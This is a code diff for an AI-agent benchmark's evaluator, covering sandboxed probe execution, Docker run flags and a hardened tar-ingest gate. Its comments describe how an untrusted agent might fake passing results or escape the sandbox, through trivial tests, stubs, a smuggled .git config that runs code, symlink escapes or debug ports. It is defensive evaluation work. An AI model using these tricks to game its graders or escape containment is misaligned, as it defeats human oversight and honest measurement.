+  let cursor = 0;
+  let hasEval = false;
+  while (cursor < argv.length) {
+    const arg = argv[cursor]!;
+    if (arg === "-e" || arg === "--eval") {
+      // The expression and everything after it are script arguments, not flags.
+      flags.push(arg, argv[cursor + 1] ?? "");
+      cursor += 2;
+      hasEval = true;
+      break;
+    }
+    if (!arg.startsWith("-")) break; // file probe: file + script args follow
+    if (!(ALLOWED_NODE_FLAGS as readonly string[]).includes(arg)) {
+      return {
+        exit_code: null,
+        stdout: "",
+        stderr: `probe: node flag ${arg} is not in the evaluator allowlist`,
+        timed_out: false,
+        truncated: false,
+      };
+    }
+    flags.push(arg);
+    cursor += 1;
+  }
+  const scriptArgs = argv.slice(cursor);
+  if (!hasEval && scriptArgs.length === 0) {
+    return { exit_code: null, stdout: "", stderr: "probe: no file or -e expression given", timed_out: false, truncated: false };
+  }
+
+  const timeoutMs = spec.timeout_ms ?? DEFAULT_PROBE_TIMEOUT_MS;
+  const env = hermeticEnv({ scratchDir: context.scratchDir, nodeBinDir: dirname(process.execPath) });
+  const spawnOptions: SpawnSyncOptions = {
+    cwd: context.treeRoot,
+    env,
+    encoding: "buffer",
+    timeout: timeoutMs,
+    maxBuffer: MAX_PROBE_OUTPUT_BYTES,
+    killSignal: "SIGKILL",
+  };
+  // Privilege drop: when the engine runs privileged (root in the pinned
+  // image), candidate code must not. The sealed store and /cdeb are
+  // root-owned and 0400/0500, so an unprivileged probe cannot read them.
+  if (typeof process.getuid === "function" && process.getuid() === 0) {
+    spawnOptions.uid = PROBE_UID;
+    spawnOptions.gid = PROBE_GID;
+  }
+  const result = spawnSync(process.execPath, [...flags, ...scriptArgs], spawnOptions);
+
+  const stdoutRaw = (result.stdout ?? Buffer.alloc(0)) as Buffer;
+  const stderrRaw = (result.stderr ?? Buffer.alloc(0)) as Buffer;
+  const truncated = stdoutRaw.length >= MAX_PROBE_OUTPUT_BYTES || stderrRaw.length >= MAX_PROBE_OUTPUT_BYTES;
+
+  return {
+    exit_code: result.status,
+    stdout: stdoutRaw.toString("utf8"),
+    stderr: stderrRaw.toString("utf8"),
+    timed_out: result.error !== undefined && (result.error as NodeJS.ErrnoException).code === "ETIMEDOUT" || (result.signal === "SIGKILL" && result.status === null),
+    truncated,
+  };
+};
+
+/** Strip exactly one trailing newline; nothing else about the bytes changes. */
+export const normalizeProbeStdout = (stdout: string): string =>
+  stdout.endsWith("\n") ? stdout.slice(0, -1) : stdout;
+
+/** Mechanical expectation check — the only verdict-relevant use of a probe. */
+export const probeMeets = (spec: ProbeSpec, result: ProbeResult): boolean => {
+  if (result.timed_out) return false;
+  if (result.exit_code !== spec.expect_exit) return false;
+  if (spec.expect_stdout !== undefined && normalizeProbeStdout(result.stdout) !== spec.expect_stdout) return false;
+  return true;
+};

--- a/bench/cdeb/evaluator/runner-local.ts
+++ b/bench/cdeb/evaluator/runner-local.ts
@@ -1,0 +1,107 @@
+/**
+ * CDEB-06: the local evaluation runner — the qualification and development
+ * surface for the evaluator pipeline.
+ *
+ * This runs the SAME entrypoint the pinned image runs, as a child process
+ * under the hermetic environment (env.ts): allowlisted env only, HOME and
+ * TMPDIR inside a fresh scratch, pinned TZ/locale, nothing inherited from
+ * the host. The verdict therefore proves the structural controls on any
+ * machine:
+ *
+ *   - evaluator code and oracle come from the sealed store, not the tree;
+ *   - nothing candidate-written executes with evaluator authority;
+ *   - the verdict derives from the pinned harness's observations;
+ *   - host environment (secrets, TZ, locale, NODE_OPTIONS) cannot reach it.
+ *
+ * What this runner does NOT provide, stated plainly: kernel-level
+ * containment. Network isolation, filesystem confinement outside the env/HOME
+ * construction, CPU/memory/PID limits — those are the OCI runner's controls
+ * (runner-oci.ts), and study rows must be produced there. A verdict here is
+ * a qualification artifact, not a measured row.
+ */
+
+import { chmodSync, mkdtempSync, readdirSync, realpathSync, rmSync, statSync } from "node:fs";
+import { spawnSync } from "node:child_process";
+import { tmpdir } from "node:os";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { hermeticEnv } from "./env.ts";
+import type { EvaluatorOutput } from "./types.ts";
+
+const HERE = dirname(fileURLToPath(import.meta.url));
+export const ENTRYPOINT_PATH = join(HERE, "entrypoint.ts");
+
+export interface LocalEvaluationRequest {
+  readonly tasksDir: string;
+  readonly taskId: string;
+  readonly archivePath: string;
+  readonly claimedOid?: string;
+  readonly imageDigest?: string;
+  readonly timeoutMs?: number;
+}
+
+export interface LocalEvaluationResult {
+  readonly exitCode: number | null;
+  /** Parsed verdict when exit 0 and stdout was canonical JSON. */
+  readonly verdict: EvaluatorOutput | null;
+  /** Exact stdout bytes — determinism is asserted on these. */
+  readonly rawStdout: Buffer;
+  readonly stderr: string;
+  readonly timedOut: boolean;
+}
+
+export const evaluateLocal = (request: LocalEvaluationRequest): LocalEvaluationResult => {
+  const scratch = mkdtempSync(join(realpathSync(tmpdir()), "cdeb-eval-local-"));
+  const args = [
+    "--experimental-strip-types",
+    ENTRYPOINT_PATH,
+    "--tasks", request.tasksDir,
+    "--task", request.taskId,
+    "--tree", request.archivePath,
+  ];
+  if (request.claimedOid !== undefined) args.push("--claimed-oid", request.claimedOid);
+  if (request.imageDigest !== undefined) args.push("--image-digest", request.imageDigest);
+
+  const result = spawnSync(process.execPath, args, {
+    cwd: scratch,
+    env: hermeticEnv({ scratchDir: scratch, nodeBinDir: dirname(process.execPath) }),
+    encoding: "buffer",
+    timeout: request.timeoutMs ?? 120_000,
+    maxBuffer: 16 * 1024 * 1024,
+    killSignal: "SIGKILL",
+  });
+
+  const stdout = (result.stdout ?? Buffer.alloc(0)) as Buffer;
+  const stderr = ((result.stderr ?? Buffer.alloc(0)) as Buffer).toString("utf8");
+  const timedOut = result.signal === "SIGKILL" && result.status === null;
+
+  let verdict: EvaluatorOutput | null = null;
+  if (result.status === 0) {
+    try {
+      verdict = JSON.parse(stdout.toString("utf8")) as EvaluatorOutput;
+    } catch {
+      verdict = null;
+    }
+  }
+
+  // The extraction inside scratch is read-only by construction; restore
+  // permissions before removing so the qualification surface leaves no
+  // debris behind.
+  try {
+    const unlock = (dir: string): void => {
+      for (const name of readdirSync(dir)) {
+        const path = join(dir, name);
+        const stat = statSync(path);
+        if (stat.isDirectory()) unlock(path);
+        chmodSync(path, stat.mode | 0o700);
+      }
+    };
+    unlock(scratch);
+    rmSync(scratch, { recursive: true, force: true });
+  } catch {
+    // the tmp filesystem reclaims whatever is left
+  }
+
+  return { exitCode: result.status, verdict, rawStdout: stdout, stderr, timedOut };
+};

--- a/bench/cdeb/evaluator/runner-oci.ts
+++ b/bench/cdeb/evaluator/runner-oci.ts
@@ -1,0 +1,163 @@
+/**
+ * CDEB-06: the OCI evaluation runner — the study's containment surface
+ * (PRD §12.1/§12.2).
+ *
+ * The pinned image runs one evaluation with:
+ *
+ *   --network none          no network, full stop (§12.2)
+ *   --read-only             rootfs is immutable; scratch is a size-capped tmpfs
+ *   --cap-drop ALL          no capabilities beyond a plain process
+ *   --security-opt no-new-privileges
+ *   --cpus / --memory / --pids-limit    §12.1's frozen resource envelope
+ *   candidate archive bind-mounted READ-ONLY; sealed tasks bind-mounted READ-ONLY
+ *   no host HOME, no docker socket, no host config mounted
+ *
+ * FAIL-CLOSED, by design: when no OCI daemon is reachable, this runner
+ * throws `EvaluatorRuntimeUnavailable`. There is no silent downgrade to a
+ * weaker surface — §24.1 names the fail-open isolation fallback as a pattern
+ * this benchmark must not reuse. Qualification on a daemon-less machine uses
+ * runner-local.ts and says so in every artifact it produces.
+ *
+ * `buildEvaluatorRunArgs` is pure: the exact argv is inspectable and testable
+ * on a machine that will never run a container, and a drift between this
+ * argv and §12's requirements is a test failure rather than a review hope.
+ */
+
+import { spawnSync } from "node:child_process";
+import { readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { sha256Hex } from "./tree.ts";
+
+const HERE = dirname(fileURLToPath(import.meta.url));
+
+/** §12.1's frozen envelope. Changing these is a protocol change, not a tune. */
+export const EVALUATOR_RESOURCE_LIMITS = {
+  cpu_limit: 2,
+  memory_mb: 4096,
+  pids_limit: 256,
+  timeout_ms: 180_000,
+  tmpfs_size_mb: 512,
+} as const;
+
+export class EvaluatorRuntimeUnavailable extends Error {
+  constructor(detail: string) {
+    super(`evaluator OCI runtime unavailable: ${detail}`);
+    this.name = "EvaluatorRuntimeUnavailable";
+  }
+}
+
+export interface OciEvaluationRequest {
+  /** Pinned image reference, digest form (`repo@sha256:...`) at study time. */
+  readonly imageRef: string;
+  /** Host path of the final-tree archive; mounted read-only. */
+  readonly archivePath: string;
+  /** Host path of the sealed task store; mounted read-only. */
+  readonly tasksDir: string;
+  readonly taskId: string;
+  readonly claimedOid?: string;
+  readonly imageDigest?: string;
+}
+
+/**
+ * The exact `docker run` argv. Pure and total: every control §12 requires is
+ * visible here as a flag, so the test suite can assert the contract without
+ * running a container.
+ */
+export const buildEvaluatorRunArgs = (request: OciEvaluationRequest): string[] => {
+  const limits = EVALUATOR_RESOURCE_LIMITS;
+  const args = [
+    "run", "--rm", "--interactive",
+    "--network", "none",
+    "--read-only",
+    "--tmpfs", `/tmp:rw,noexec,nosuid,size=${String(limits.tmpfs_size_mb)}m`,
+    "--cpus", String(limits.cpu_limit),
+    "--memory", `${String(limits.memory_mb)}m`,
+    "--memory-swap", `${String(limits.memory_mb)}m`,
+    "--pids-limit", String(limits.pids_limit),
+    "--cap-drop", "ALL",
+    "--security-opt", "no-new-privileges",
+    "--env", "TZ=UTC",
+    "--env", "LC_ALL=C",
+    "--env", "HOME=/tmp",
+    // The engine runs privileged INSIDE the container (caps dropped,
+    // read-only rootfs, no network) because the probes it spawns drop to
+    // uid/gid 65534 (probe.ts): candidate code must not be able to read the
+    // sealed store or the engine sources. The sealed store must therefore be
+    // host-side 0400 root:wheel before this mount — a world-readable sealed
+    // mount is a frozen-task leak, and the freeze gate checks it.
+    "--mount", `type=bind,source=${request.archivePath},target=/input/tree.tar.zst,readonly`,
+    "--mount", `type=bind,source=${request.tasksDir},target=/sealed,readonly`,
+    request.imageRef,
+    "/cdeb/evaluate",
+    "--tasks", "/sealed",
+    "--task", request.taskId,
+    "--tree", "/input/tree.tar.zst",
+  ];
+  if (request.claimedOid !== undefined) args.push("--claimed-oid", request.claimedOid);
+  if (request.imageDigest !== undefined) args.push("--image-digest", request.imageDigest);
+  return args;
+};
+
+export const dockerDaemonAvailable = (): boolean => {
+  const result = spawnSync("docker", ["info", "--format", "{{.ServerVersion}}"], {
+    encoding: "utf8",
+    timeout: 5_000,
+  });
+  return result.status === 0;
+};
+
+/**
+ * Runs one evaluation in the pinned image. Throws EvaluatorRuntimeUnavailable
+ * when the daemon cannot be reached — never falls back to a weaker surface.
+ */
+export const runEvaluatorOci = (request: OciEvaluationRequest): { stdout: Buffer; stderr: string; exitCode: number | null } => {
+  if (!dockerDaemonAvailable()) {
+    throw new EvaluatorRuntimeUnavailable(
+      "no reachable docker daemon — study evaluation requires the pinned image; refusing to downgrade",
+    );
+  }
+  const result = spawnSync("docker", buildEvaluatorRunArgs(request), {
+    encoding: "buffer",
+    timeout: EVALUATOR_RESOURCE_LIMITS.timeout_ms + 30_000,
+    maxBuffer: 16 * 1024 * 1024,
+    killSignal: "SIGKILL",
+  });
+  return {
+    stdout: (result.stdout ?? Buffer.alloc(0)) as Buffer,
+    stderr: ((result.stderr ?? Buffer.alloc(0)) as Buffer).toString("utf8"),
+    exitCode: result.status,
+  };
+};
+
+/* -------------------------------------------------------------------------- */
+/* Image identity                                                             */
+/* -------------------------------------------------------------------------- */
+
+/**
+ * Engine sources the image bakes in. The sealed task modules are added at
+ * freeze time (they are §5.2 private assets), so the FULL image identity is
+ * `combineImageIdentity(contextDigest, sealedBundleDigest)`; the context
+ * digest alone identifies the evaluator engine the image carries.
+ */
+export const ENGINE_CONTEXT_FILES = [
+  "entrypoint.ts", "engine.ts", "env.ts", "freeze-tree.ts", "git-tree.ts",
+  "ingest.ts", "probe.ts", "tree.ts", "types.ts", "runner-local.ts", "runner-oci.ts",
+  "image/Dockerfile", "image/cdeb-evaluate.sh",
+] as const;
+
+export const evaluatorImageContextDigest = (): string => {
+  const manifest = ENGINE_CONTEXT_FILES.map((name) => {
+    const bytes = readFileSync(join(HERE, name));
+    return `${name} ${sha256Hex(bytes)}`;
+  }).join("\n");
+  return sha256Hex(manifest);
+};
+
+/** `sha256:<hex>` form for the verdict field, from a bare hex digest. */
+export const digestRef = (hexDigest: string): string => `sha256:${hexDigest}`;
+
+/** Full image identity recorded by the freeze once the sealed bundle is known. */
+export const combineImageIdentity = (contextDigest: string, sealedBundleDigest: string): string =>
+  sha256Hex(`${contextDigest}:${sealedBundleDigest}`);

--- a/bench/cdeb/evaluator/tree.ts
+++ b/bench/cdeb/evaluator/tree.ts
@@ -1,0 +1,363 @@
+/**
+ * CDEB-06: deterministic tree archives and the hygiene gate every candidate
+ * archive must pass before the evaluator looks at a byte of it.
+ *
+ * Two directions, one format:
+ *
+ *   - FREEZE side (§11.1): the staged final tree becomes a byte-reproducible
+ *     ustar archive — sorted entries, zeroed mtime/uid/gid, modes normalized
+ *     to git semantics. The same tree yields the same bytes on any machine,
+ *     so `archive_sha256` is a comparable identity rather than a recording
+ *     accident of whichever tar happened to run.
+ *   - INGEST side (evaluator): the candidate archive is UNTRUSTED INPUT. It
+ *     is parsed by this module's own reader — never by a system tar whose
+ *     flags and versions vary — and every entry passes the hygiene gate
+ *     before anything touches disk: no absolute paths, no `..` components,
+ *     no `.git` smuggling, no hardlinks or device nodes, no symlink whose
+ *     target leaves the tree, no path through a directory symlink.
+ *
+ * The `.git` refusal is load-bearing: the evaluator runs git inside the
+ * extraction to recompute the tree OID, and a smuggled `.git/config` can
+ * carry `core.fsmonitor` / hooks configuration — code execution from a file
+ * the candidate wrote. A candidate tree never legitimately contains `.git`
+ * (freeze stages tracked content only), so the refusal costs nothing.
+ */
+
+import { mkdirSync, readlinkSync, readdirSync, readFileSync, statSync, symlinkSync, writeFileSync, chmodSync } from "node:fs";
+import { createHash } from "node:crypto";
+import { join, posix } from "node:path";
+import { constants as zstdConstants, zstdCompressSync, zstdDecompressSync } from "node:zlib";
+
+import type { IngestLimits, IngestRefusal } from "./types.ts";
+import { DEFAULT_INGEST_LIMITS } from "./types.ts";
+
+/** zstd level pinned so compressed archive bytes are reproducible run-to-run. */
+export const ARCHIVE_ZSTD_LEVEL = 3;
+
+/** Magic bytes of a zstd frame; used to accept `.tar` and `.tar.zst` alike. */
+const ZSTD_MAGIC = Buffer.from([0x28, 0xb5, 0x2f, 0xfd]);
+
+export const sha256Hex = (input: Buffer | string): string =>
+  createHash("sha256").update(input).digest("hex");
+
+/** One archive entry as the freeze side emits and the ingest side validates. */
+export interface ArchiveEntry {
+  /** Tree-relative path, `/`-separated, no leading slash, no `.`/`..`. */
+  readonly path: string;
+  readonly type: "file" | "dir" | "symlink";
+  /** Regular-file contents; empty for dirs and symlinks. */
+  readonly content: Buffer;
+  /** Symlink target string; empty otherwise. */
+  readonly linkTarget: string;
+  /** True when any executable bit is set (git's only file-mode distinction). */
+  readonly executable: boolean;
+}
+
+/** Split a tree-relative path into components, refusing the shapes that escape. */
+const componentsOf = (path: string): string[] | null => {
+  if (path.length === 0 || path.startsWith("/") || path.includes("\\") || path.includes("\0")) return null;
+  const parts = path.split("/");
+  for (const part of parts) {
+    if (part === "" || part === "." || part === "..") return null;
+  }
+  return parts;
+};
+
+/** Does this path component list stay inside the root? (lexical containment) */
+const staysInside = (parts: readonly string[]): boolean => {
+  let depth = 0;
+  for (const part of parts) {
+    if (part === "..") {
+      depth -= 1;
+      if (depth < 0) return false;
+    } else if (part !== "." && part !== "") {
+      depth += 1;
+    }
+  }
+  return true;
+};
+
+/* -------------------------------------------------------------------------- */
+/* ustar serialization — deliberately hand-rolled: same bytes on any machine  */
+/* -------------------------------------------------------------------------- */
+
+const BLOCK = 512;
+
+const octal = (value: number, width: number): Buffer => {
+  const text = value.toString(8).padStart(width - 1, "0");
+  if (text.length > width - 1) throw new Error(`tar: value ${String(value)} does not fit ${String(width)} octal bytes`);
+  const buffer = Buffer.alloc(width);
+  buffer.write(text, "ascii");
+  return buffer; // final byte stays NUL
+};
+
+const fixed = (text: string, width: number): Buffer => {
+  const buffer = Buffer.alloc(width);
+  const bytes = Buffer.from(text, "utf8");
+  if (bytes.length > width) throw new Error(`tar: field too wide: ${text.slice(0, 32)}...`);
+  bytes.copy(buffer);
+  return buffer;
+};
+
+const headerFor = (entry: ArchiveEntry): Buffer => {
+  const parts = componentsOf(entry.path);
+  if (parts === null) throw new Error(`tar: refusing to serialize unsafe path ${entry.path}`);
+  const name = parts.join("/");
+  if (Buffer.byteLength(name, "utf8") > 100) {
+    throw new Error(`tar: name longer than 100 bytes (pax refused by this format): ${name}`);
+  }
+  const header = Buffer.alloc(BLOCK);
+  fixed(name, 100).copy(header, 0);
+  const mode = entry.type === "dir" || entry.type === "symlink" ? 0o755 : entry.executable ? 0o755 : 0o644;
+  octal(mode, 8).copy(header, 100);
+  octal(0, 8).copy(header, 108); // uid
+  octal(0, 8).copy(header, 116); // gid
+  octal(entry.type === "file" ? entry.content.length : 0, 12).copy(header, 124);
+  octal(0, 12).copy(header, 136); // mtime: zeroed — the archive carries no clocks
+  const typeflag = entry.type === "file" ? "0" : entry.type === "dir" ? "5" : "2";
+  header.write(typeflag, 156, "ascii");
+  if (entry.type === "symlink") fixed(entry.linkTarget, 100).copy(header, 157);
+  header.write("ustar", 257, "ascii"); // magic, byte 263 stays NUL
+  header.write("00", 263, "ascii");
+  // uname/gname/devmajor/devminor/prefix left zero — no host identity leaks
+  header.fill(0x20, 148, 156); // checksum field counts as spaces while summing
+  let sum = 0;
+  for (const byte of header) sum += byte;
+  header.write(sum.toString(8).padStart(6, "0"), 148, "ascii");
+  header.writeUInt8(0, 154);
+  header.writeUInt8(0x20, 155);
+  return header;
+};
+
+/** Deterministic ustar bytes for a set of entries (order is imposed here). */
+export const renderArchive = (entries: readonly ArchiveEntry[]): Buffer => {
+  const sorted = [...entries].sort((a, b) => (a.path < b.path ? -1 : a.path > b.path ? 1 : 0));
+  const seen = new Set<string>();
+  const chunks: Buffer[] = [];
+  for (const entry of sorted) {
+    if (seen.has(entry.path)) throw new Error(`tar: duplicate entry ${entry.path}`);
+    seen.add(entry.path);
+    chunks.push(headerFor(entry));
+    if (entry.type === "file" && entry.content.length > 0) {
+      chunks.push(entry.content);
+      const pad = (BLOCK - (entry.content.length % BLOCK)) % BLOCK;
+      if (pad > 0) chunks.push(Buffer.alloc(pad));
+    }
+  }
+  chunks.push(Buffer.alloc(BLOCK * 2)); // end-of-archive marker
+  return Buffer.concat(chunks);
+};
+
+/** Walk a real directory into archive entries (freeze side only). */
+export const entriesFromDirectory = (root: string, relativePaths: readonly string[]): ArchiveEntry[] => {
+  const entries: ArchiveEntry[] = [];
+  const dirs = new Set<string>();
+  for (const rel of relativePaths) {
+    const abs = join(root, rel);
+    const stat = statSync(abs);
+    const parts = componentsOf(rel);
+    if (parts === null) throw new Error(`tree: unsafe path in staged set: ${rel}`);
+    for (let depth = 1; depth < parts.length; depth += 1) {
+      dirs.add(parts.slice(0, depth).join("/"));
+    }
+    if (stat.isSymbolicLink()) {
+      entries.push({ path: rel, type: "symlink", content: Buffer.alloc(0), linkTarget: readlinkSync(abs), executable: false });
+    } else if (stat.isFile()) {
+      entries.push({
+        path: rel,
+        type: "file",
+        content: readFileSync(abs),
+        linkTarget: "",
+        executable: (stat.mode & 0o111) !== 0,
+      });
+    } else {
+      throw new Error(`tree: unsupported entry in staged set: ${rel}`);
+    }
+  }
+  for (const dir of dirs) entries.push({ path: dir, type: "dir", content: Buffer.alloc(0), linkTarget: "", executable: false });
+  return entries;
+};
+
+/* -------------------------------------------------------------------------- */
+/* ustar parsing + hygiene gate (ingest side)                                 */
+/* -------------------------------------------------------------------------- */
+
+interface ParsedEntry {
+  readonly name: string;
+  readonly mode: number;
+  readonly typeflag: string;
+  readonly size: number;
+  readonly linkname: string;
+  readonly data: Buffer;
+}
+
+const parseOctal = (buffer: Buffer, offset: number, length: number): number => {
+  const text = buffer.subarray(offset, offset + length).toString("ascii").replace(/[\0 ]+$/g, "").trim();
+  if (text === "") return 0;
+  if (!/^[0-7]+$/.test(text)) throw new Error("tar: corrupt octal field");
+  return Number.parseInt(text, 8);
+};
+
+const parseUstar = (bytes: Buffer): ParsedEntry[] => {
+  const entries: ParsedEntry[] = [];
+  let offset = 0;
+  let emptyBlocks = 0;
+  while (offset + BLOCK <= bytes.length) {
+    const header = bytes.subarray(offset, offset + BLOCK);
+    if (header.every((byte) => byte === 0)) {
+      emptyBlocks += 1;
+      offset += BLOCK;
+      if (emptyBlocks >= 2) break;
+      continue;
+    }
+    emptyBlocks = 0;
+    const magic = header.subarray(257, 263).toString("ascii");
+    if (!magic.startsWith("ustar")) throw new Error("tar: not a ustar archive (pax/gnu variants refused)");
+    let sum = 0;
+    for (let i = 0; i < BLOCK; i += 1) sum += i >= 148 && i < 156 ? 0x20 : (header[i] ?? 0);
+    const recorded = parseOctal(header, 148, 8);
+    if (sum !== recorded) throw new Error("tar: header checksum mismatch");
+    const name = header.subarray(0, 100).toString("utf8").replace(/\0+$/g, "");
+    const mode = parseOctal(header, 100, 8);
+    const size = parseOctal(header, 124, 12);
+    const typeflag = header.subarray(156, 157).toString("ascii");
+    const linkname = header.subarray(157, 257).toString("utf8").replace(/\0+$/g, "");
+    offset += BLOCK;
+    const data = bytes.subarray(offset, offset + size);
+    if (data.length < size) throw new Error("tar: truncated entry data");
+    offset += Math.ceil(size / BLOCK) * BLOCK;
+    entries.push({ name, mode, typeflag, size, linkname, data: Buffer.from(data) });
+  }
+  return entries;
+};
+
+export interface ExtractionResult {
+  readonly refusal: IngestRefusal | null;
+  readonly fileCount: number;
+}
+
+/**
+ * Extracts a candidate archive under `dest`, enforcing the hygiene gate.
+ * Returns a refusal instead of throwing: a hostile archive is not an
+ * infrastructure problem, it is a candidate tree that fails evaluation.
+ */
+export const extractTreeArchive = (
+  archiveBytes: Buffer,
+  dest: string,
+  limits: IngestLimits = DEFAULT_INGEST_LIMITS,
+): ExtractionResult => {
+  const refuse = (code: IngestRefusal["code"], detail: string): ExtractionResult => ({
+    refusal: { code, detail },
+    fileCount: 0,
+  });
+
+  let parsed: ParsedEntry[];
+  try {
+    parsed = parseUstar(archiveBytes);
+  } catch (error) {
+    return refuse("invalid-tar", (error as Error).message);
+  }
+  // A truncated or garbage archive shorter than one block parses as zero
+  // entries; no legitimate freeze produces an empty archive (§11.1 freezes
+  // a task repository, which always has files), so fail closed.
+  if (parsed.length === 0) {
+    return refuse("invalid-tar", "archive contains no entries");
+  }
+
+  const symlinkDirs = new Set<string>(); // tree-relative dirs that are symlinks
+  const seen = new Set<string>();
+  let totalBytes = 0;
+  let fileCount = 0;
+
+  mkdirSync(dest, { recursive: true });
+
+  for (const entry of parsed) {
+    if (entry.typeflag === "x" || entry.typeflag === "g" || entry.typeflag === "L" || entry.typeflag === "K") {
+      return refuse("pax-or-gnu-extension-refused", `entry ${entry.name}: extension headers are refused`);
+    }
+    if (entry.name.length > limits.max_path_length) {
+      return refuse("path-too-long", `entry ${entry.name.slice(0, 64)}... exceeds ${String(limits.max_path_length)} bytes`);
+    }
+    const parts = componentsOf(entry.name);
+    if (parts === null || !staysInside(parts)) {
+      return refuse("path-escapes-tree", `entry ${entry.name} is not contained to the tree`);
+    }
+    if (parts.some((part) => part === ".git")) {
+      return refuse("dot-git-smuggled", `entry ${entry.name}: .git content is refused — it can configure git code execution`);
+    }
+    const key = parts.join("/");
+    if (seen.has(key)) return refuse("duplicate-entry", `entry ${entry.name} appears twice`);
+    seen.add(key);
+
+    // Never write through a directory symlink placed earlier in the archive.
+    let ancestor = "";
+    for (const part of parts.slice(0, -1)) {
+      ancestor = ancestor === "" ? part : `${ancestor}/${part}`;
+      if (symlinkDirs.has(ancestor)) {
+        return refuse("symlink-through-symlink", `entry ${entry.name} would write through symlink ${ancestor}`);
+      }
+    }
+
+    const target = join(dest, ...parts);
+
+    if (entry.typeflag === "5") {
+      mkdirSync(target, { recursive: true });
+      continue;
+    }
+
+    if (entry.typeflag === "2") {
+      const linkParts = componentsOf(entry.linkname);
+      const resolvedLexical = posix.normalize(
+        parts.slice(0, -1).concat(linkParts ?? ["\0"]).join("/"),
+      );
+      if (
+        linkParts === null ||
+        entry.linkname.startsWith("/") ||
+        !staysInside(resolvedLexical.split("/")) ||
+        resolvedLexical.split("/").some((part) => part === ".git")
+      ) {
+        return refuse("symlink-escapes-tree", `symlink ${entry.name} -> ${entry.linkname} leaves the tree`);
+      }
+      mkdirSync(join(dest, ...parts.slice(0, -1)), { recursive: true });
+      symlinkSync(entry.linkname, target);
+      // a symlink occupying a directory slot poisons any later entry under it
+      symlinkDirs.add(key);
+      fileCount += 1;
+      continue;
+    }
+
+    if (entry.typeflag === "1") return refuse("hardlink-refused", `entry ${entry.name}: hardlinks are refused`);
+    if (entry.typeflag !== "0") {
+      return refuse("special-file-refused", `entry ${entry.name}: typeflag ${entry.typeflag} is refused`);
+    }
+
+    if (entry.size > limits.max_file_bytes) {
+      return refuse("file-too-large", `entry ${entry.name} is ${String(entry.size)} bytes (cap ${String(limits.max_file_bytes)})`);
+    }
+    totalBytes += entry.size;
+    if (totalBytes > limits.max_total_bytes) {
+      return refuse("archive-too-large", `archive exceeds ${String(limits.max_total_bytes)} bytes unpacked`);
+    }
+    fileCount += 1;
+    if (fileCount > limits.max_files) {
+      return refuse("too-many-files", `archive exceeds ${String(limits.max_files)} files`);
+    }
+
+    mkdirSync(join(dest, ...parts.slice(0, -1)), { recursive: true });
+    writeFileSync(target, entry.data);
+    // Read-only from here on: nothing the evaluator runs may modify the tree
+    // between checks. Executable bit preserved so probes see git semantics.
+    chmodSync(target, (entry.mode & 0o111) !== 0 ? 0o555 : 0o444);
+  }
+
+  return { refusal: null, fileCount };
+};
+
+/** Accepts raw tar or a zstd frame and returns the tar bytes. */
+export const maybeDecompress = (bytes: Buffer): Buffer =>
+  bytes.subarray(0, 4).equals(ZSTD_MAGIC) ? zstdDecompressSync(bytes) : bytes;
+
+export const compressZstd = (bytes: Buffer): Buffer =>
+  zstdCompressSync(bytes, {
+    params: { [zstdConstants.ZSTD_c_compressionLevel]: ARCHIVE_ZSTD_LEVEL },
+  });

--- a/bench/cdeb/evaluator/types.ts
+++ b/bench/cdeb/evaluator/types.ts
@@ -1,0 +1,178 @@
+/**
+ * CDEB-06: contracts for the immutable evaluator (PRD §12).
+ *
+ * Everything here serves one property: the agent that produced the candidate
+ * tree is an UNTRUSTED AUTHOR of it. It can write anything — a test that
+ * passes trivially, a stub that satisfies a matcher, a file that pretends to
+ * be the evaluator's own output. So:
+ *
+ *   - the evaluator's code and task oracles come from the pinned image / sealed
+ *     task store, never from the candidate tree;
+ *   - nothing the candidate wrote is executed with the evaluator's authority
+ *     (no package.json scripts, no candidate test runners, no candidate
+ *     config — §12.3);
+ *   - the verdict is derived from what the pinned harness observes — the
+ *     evaluator's own functional checks and decision oracle reading a
+ *     read-only extraction of the tree — never from anything the tree reports
+ *     about itself.
+ *
+ * The verdict shape is frozen by `bench/cdeb/schemas/evaluator.schema.json`
+ * (PRD §12.4): no free-form quality score is representable, and no field
+ * exists for the candidate to influence beyond what the checks observed.
+ */
+
+/** The frozen §12.4 output. Key order here is the canonical serialization order. */
+export interface EvaluatorOutput {
+  readonly schema_version: 1;
+  readonly task_id: string;
+  readonly functional_pass: boolean;
+  readonly rejected_decision_revived: boolean;
+  readonly functional_checks: {
+    readonly passed: number;
+    readonly failed: number;
+  };
+  readonly decision_oracle_code: "SAFE" | "REVIVED";
+  readonly evaluator_image_digest: string;
+  readonly candidate_tree_oid: string;
+}
+
+/** One evaluator-owned functional check as it ran. */
+export interface FunctionalCheckResult {
+  readonly name: string;
+  readonly passed: boolean;
+}
+
+/**
+ * Read-only view of the materialized candidate tree handed to task code.
+ *
+ * Every listing is sorted; every read is contained to the tree root. Task
+ * oracles see exactly the bytes the agent left and nothing else — no process
+ * environment, no clock, no network handle. An oracle is a pure function of
+ * this view; §4.8 reviews oracle determinism before a task is sealed.
+ */
+export interface TreeView {
+  /** Absolute path of the extracted tree root (read-only on disk). */
+  readonly root: string;
+  /** True when the path exists inside the tree. Path traversal is refused. */
+  exists(path: string): boolean;
+  /** UTF-8 contents, or null when the path is absent or not a regular file. */
+  read(path: string): string | null;
+  /** Sorted entry names of a directory, or [] when absent. */
+  list(path: string): string[];
+  /** Sorted tree-relative paths of every regular file. */
+  files(): string[];
+}
+
+/**
+ * A behavioral probe: candidate code run with EVALUATOR-OWNED command and
+ * arguments (§12.3: the evaluator may build/run candidate code, but the
+ * command, the arguments and the expected behavior are the evaluator's).
+ *
+ * The probe's stdout/stderr are DATA. No verdict logic anywhere trusts what
+ * the candidate says about itself; a probe only matters through the
+ * expectations the task module states up front.
+ */
+export interface ProbeSpec {
+  /**
+   * Arguments after the pinned node executable. Must start with the file to
+   * run (tree-relative) or `-e`. Flags are allowed only from the engine's
+   * frozen allowlist — arbitrary node flags are a sandbox surface (for
+   * example `--inspect` opens a network port) and are refused.
+   */
+  readonly argv: readonly string[];
+  /** Exact exit code the task expects. */
+  readonly expect_exit: number;
+  /** Exact stdout the task expects, after stripping one trailing newline. */
+  readonly expect_stdout?: string;
+  /** Kill the probe after this many milliseconds. */
+  readonly timeout_ms?: number;
+}
+
+export interface ProbeResult {
+  readonly exit_code: number | null;
+  readonly stdout: string;
+  readonly stderr: string;
+  readonly timed_out: boolean;
+  /** True when the output hit the capture cap and was truncated. */
+  readonly truncated: boolean;
+}
+
+/**
